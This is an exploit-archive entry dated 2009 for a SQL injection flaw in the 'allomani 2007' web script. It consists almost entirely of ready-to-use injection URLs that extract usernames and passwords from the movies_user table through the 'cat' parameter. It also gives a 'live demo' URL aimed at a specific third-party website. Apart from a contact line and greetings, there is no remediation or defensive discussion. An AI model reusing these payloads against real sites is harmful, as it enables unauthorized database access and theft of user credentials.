allomani 2007 - 'cat' SQL Injection



EKU-ID: 17299 CVE: OSVDB-ID:
Author: NeX HaCkEr Published: 2009-08-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


==================

NaMe: allomani 2007  <= SQL Injection Vulnerability
Author : NeX HackEr
Contact: c2l@hotmail.com

==================

Script site : http://allomani.com

==================

ExplOiT:

 UserName

http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT username,2,3 from movies_user

 Password


http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT password,2,3 from movies_user

 :)

==================

Live DemO:

http://www.leeen.net/index.php?action=browse&cat=43 and 1=0 UNION AlL SELECT username,2,3 from movies_user



+========================================================+
|
| Greetz.: ~ alMaFiA ~ RmZ AlJnooP ~ GaBsH ~
|               And All Friends!!!!
+========================================================+

# milw0rm.com [2009-08-26]